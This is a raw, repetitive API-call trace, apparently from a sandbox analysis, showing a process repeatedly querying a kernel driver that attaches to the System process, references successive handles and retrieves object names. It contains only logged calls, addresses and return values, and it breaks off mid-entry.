IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0119.577] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0119.577] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0119.577] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0119.577] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0119.577] PsAcquireProcessExitSynchronization () returned 0x0 [0119.577] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0119.578] ObReferenceObjectByHandle (in: Handle=0xffffffff800006f0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8001f87680, HandleInformation=0x0) returned 0x0 [0119.578] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0119.578] PsReleaseProcessExitSynchronization () returned 0x2 [0119.578] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0119.578] ObQueryNameString (in: Object=0xfffffa8001f87680, ObjectNameInfo=0xfffffa8002928044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002928044, ReturnLength=0xfffff88005163550) returned 0x0 [0119.578] ObfDereferenceObject (Object=0xfffffa8001f87680) returned 0x2 [0119.578] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0119.578] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0119.578] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0119.578] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0119.578] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0119.578] PsAcquireProcessExitSynchronization () returned 0x0 [0119.578] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0119.578] ObReferenceObjectByHandle (in: Handle=0xffffffff800006f4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8001f85050, HandleInformation=0x0) returned 0x0 [0119.578] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0119.578] PsReleaseProcessExitSynchronization () returned 0x2 [0119.578] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0119.578] ObQueryNameString (in: Object=0xfffffa8001f85050, ObjectNameInfo=0xfffffa8002929044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002929044, ReturnLength=0xfffff88005163550) returned 0x0 [0119.578] ObfDereferenceObject (Object=0xfffffa8001f85050) returned 0x2 [0119.578] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0119.578] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0119.578] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0119.578] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0119.578] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0119.578] PsAcquireProcessExitSynchronization () returned 0x0 [0119.578] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0119.579] ObReferenceObjectByHandle (in: Handle=0xffffffff800006f8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8001f86af0, HandleInformation=0x0) returned 0x0 [0119.579] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0119.579] PsReleaseProcessExitSynchronization () returned 0x2 [0119.579] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0119.579] ObQueryNameString (in: Object=0xfffffa8001f86af0, ObjectNameInfo=0xfffffa800292a044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa800292a044, ReturnLength=0xfffff88005163550) returned 0x0 [0119.579] ObfDereferenceObject (Object=0xfffffa8001f86af0) returned 0x2 [0119.579] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0119.579] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0119.579] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0119.579] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0119.579] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0119.579] PsAcquireProcessExitSynchronization () returned 0x0 [0119.579] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0119.579] ObReferenceObjectByHandle (in: Handle=0xffffffff800006fc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8001f96ab0, HandleInformation=0x0) returned 0x0 [0119.579] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0119.579] PsReleaseProcessExitSynchronization () returned 0x2 [0119.579] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0119.579] ObQueryNameString (in: Object=0xfffffa8001f96ab0, ObjectNameInfo=0xfffffa800292b044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa800292b044, ReturnLength=0xfffff88005163550) returned 0x0 [0119.579] ObfDereferenceObject (Object=0xfffffa8001f96ab0) returned 0x2 [0119.579] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0119.579] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0119.579] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0119.579] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0119.579] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0119.580] PsAcquireProcessExitSynchronization () returned 0x0 [0119.580] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0119.580] ObReferenceObjectByHandle (in: Handle=0xffffffff80000700, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8001f95f20, HandleInformation=0x0) returned 0x0 [0119.580] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0119.580] PsReleaseProcessExitSynchronization () returned 0x2 [0119.580] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0119.580] ObQueryNameString (in: Object=0xfffffa8001f95f20, ObjectNameInfo=0xfffffa8002890044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002890044, ReturnLength=0xfffff88005163550) returned 0x0 [0119.580] ObfDereferenceObject (Object=0xfffffa8001f95f20) returned 0x2 [0119.580] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0119.580] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0119.580] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0119.580] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0119.580] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0119.580] PsAcquireProcessExitSynchronization () returned 0x0 [0119.580] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0119.580] ObReferenceObjectByHandle (in: Handle=0xffffffff80000704, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80034ebb90, HandleInformation=0x0) returned 0x0 [0119.580] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0119.580] PsReleaseProcessExitSynchronization () returned 0x2 [0119.580] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0119.580] ObQueryNameString (in: Object=0xfffffa80034ebb90, ObjectNameInfo=0xfffffa80028856c4, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80028856c4, ReturnLength=0xfffff88005163550) returned 0x0 [0119.580] ObfDereferenceObject (Object=0xfffffa80034ebb90) returned 0x2 [0119.580] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0119.580] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0119.580] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0119.580] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0119.580] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0119.580] PsAcquireProcessExitSynchronization () returned 0x0 [0119.580] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0119.581] ObReferenceObjectByHandle (in: Handle=0xffffffff80000708, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8001ed4050, HandleInformation=0x0) returned 0x0 [0119.581] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0119.581] PsReleaseProcessExitSynchronization () returned 0x2 [0119.581] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0119.581] ObQueryNameString (in: Object=0xfffffa8001ed4050, ObjectNameInfo=0xfffffa800288b044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa800288b044, ReturnLength=0xfffff88005163550) returned 0x0 [0119.581] ObfDereferenceObject (Object=0xfffffa8001ed4050) returned 0x2 [0119.581] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0119.581] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0119.581] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0119.581] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0119.581] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0119.581] PsAcquireProcessExitSynchronization () returned 0x0 [0119.581] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0119.581] ObReferenceObjectByHandle (in: Handle=0xffffffff8000070c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80038d52c0, HandleInformation=0x0) returned 0x0 [0119.581] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0119.581] PsReleaseProcessExitSynchronization () returned 0x2 [0119.581] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0119.581] ObQueryNameString (in: Object=0xfffffa80038d52c0, ObjectNameInfo=0xfffffa8002895044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002895044, ReturnLength=0xfffff88005163550) returned 0x0 [0119.581] ObfDereferenceObject (Object=0xfffffa80038d52c0) returned 0x2 [0119.581] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0119.581] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0119.582] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0119.582] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0119.582] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0119.582] PsAcquireProcessExitSynchronization () returned 0x0 [0119.582] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0119.582] ObReferenceObjectByHandle (in: Handle=0xffffffff80000710, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8001ed37c0, HandleInformation=0x0) returned 0x0 [0119.582] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0119.582] PsReleaseProcessExitSynchronization () returned 0x2 [0119.582] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0119.582] ObQueryNameString (in: Object=0xfffffa8001ed37c0, ObjectNameInfo=0xfffffa8002894044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002894044, ReturnLength=0xfffff88005163550) returned 0x0 [0119.582] ObfDereferenceObject (Object=0xfffffa8001ed37c0) returned 0x2 [0119.582] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0119.582] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0119.582] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0119.582] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0119.582] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0119.582] PsAcquireProcessExitSynchronization () returned 0x0 [0119.582] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0119.582] ObReferenceObjectByHandle (in: Handle=0xffffffff80000714, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa800398ca70, HandleInformation=0x0) returned 0x0 [0119.582] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0119.582] PsReleaseProcessExitSynchronization () returned 0x2 [0119.582] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0119.582] ObQueryNameString (in: Object=0xfffffa800398ca70, ObjectNameInfo=0xfffffa800288e044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa800288e044, ReturnLength=0xfffff88005163550) returned 0x0 [0119.583] ObfDereferenceObject (Object=0xfffffa800398ca70) returned 0x2 [0119.583] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0119.583] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0119.583] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0119.583] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0119.583] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0119.583] PsAcquireProcessExitSynchronization () returned 0x0 [0119.583] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0119.583] ObReferenceObjectByHandle (in: Handle=0xffffffff80000718, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8001ed3e50, HandleInformation=0x0) returned 0x0 [0119.583] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0119.583] PsReleaseProcessExitSynchronization () returned 0x2 [0119.583] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0119.583] ObQueryNameString (in: Object=0xfffffa8001ed3e50, ObjectNameInfo=0xfffffa8002891044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002891044, ReturnLength=0xfffff88005163550) returned 0x0 [0119.583] ObfDereferenceObject (Object=0xfffffa8001ed3e50) returned 0x2 [0119.583] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0119.583] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0119.583] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0119.583] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0119.583] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0119.583] PsAcquireProcessExitSynchronization () returned 0x0 [0119.583] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0119.583] ObReferenceObjectByHandle (in: Handle=0xffffffff8000071c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80039d2c90, HandleInformation=0x0) returned 0x0 [0119.584] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0119.584] PsReleaseProcessExitSynchronization () returned 0x2 [0119.584] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0119.584] ObQueryNameString (in: Object=0xfffffa80039d2c90, ObjectNameInfo=0xfffffa80028ab044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80028ab044, ReturnLength=0xfffff88005163550) returned 0x0 [0119.584] ObfDereferenceObject (Object=0xfffffa80039d2c90) returned 0x2 [0119.584] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0119.584] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0119.584] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0119.584] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0119.584] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0119.584] PsAcquireProcessExitSynchronization () returned 0x0 [0119.584] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0119.584] ObReferenceObjectByHandle (in: Handle=0xffffffff80000720, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8001ed2690, HandleInformation=0x0) returned 0x0 [0119.584] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0119.584] PsReleaseProcessExitSynchronization () returned 0x2 [0119.584] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0119.584] ObQueryNameString (in: Object=0xfffffa8001ed2690, ObjectNameInfo=0xfffffa800288a044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa800288a044, ReturnLength=0xfffff88005163550) returned 0x0 [0119.584] ObfDereferenceObject (Object=0xfffffa8001ed2690) returned 0x2 [0119.584] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0119.585] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0119.585] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0119.585] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0119.585] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0119.585] PsAcquireProcessExitSynchronization () returned 0x0 [0119.585] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0119.585] ObReferenceObjectByHandle (in: Handle=0xffffffff80000724, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8001ea4930, HandleInformation=0x0) returned 0x0 [0119.585] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0119.585] PsReleaseProcessExitSynchronization () returned 0x2 [0119.585] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0119.585] ObQueryNameString (in: Object=0xfffffa8001ea4930, ObjectNameInfo=0xfffffa800288f044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa800288f044, ReturnLength=0xfffff88005163550) returned 0x0 [0119.585] ObfDereferenceObject (Object=0xfffffa8001ea4930) returned 0x2 [0119.585] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0119.585] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0119.585] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0119.585] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0119.585] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0119.585] PsAcquireProcessExitSynchronization () returned 0x0 [0119.585] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0119.585] ObReferenceObjectByHandle (in: Handle=0xffffffff80000728, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8001ed2d20, HandleInformation=0x0) returned 0x0 [0119.585] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0119.585] PsReleaseProcessExitSynchronization () returned 0x2 [0119.585] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0119.585] ObQueryNameString (in: Object=0xfffffa8001ed2d20, ObjectNameInfo=0xfffffa8002892044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002892044, ReturnLength=0xfffff88005163550) returned 0x0 [0119.585] ObfDereferenceObject (Object=0xfffffa8001ed2d20) returned 0x2 [0119.586] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0119.586] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0119.586] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0119.586] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0119.586] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0119.586] PsAcquireProcessExitSynchronization () returned 0x0 [0119.586] 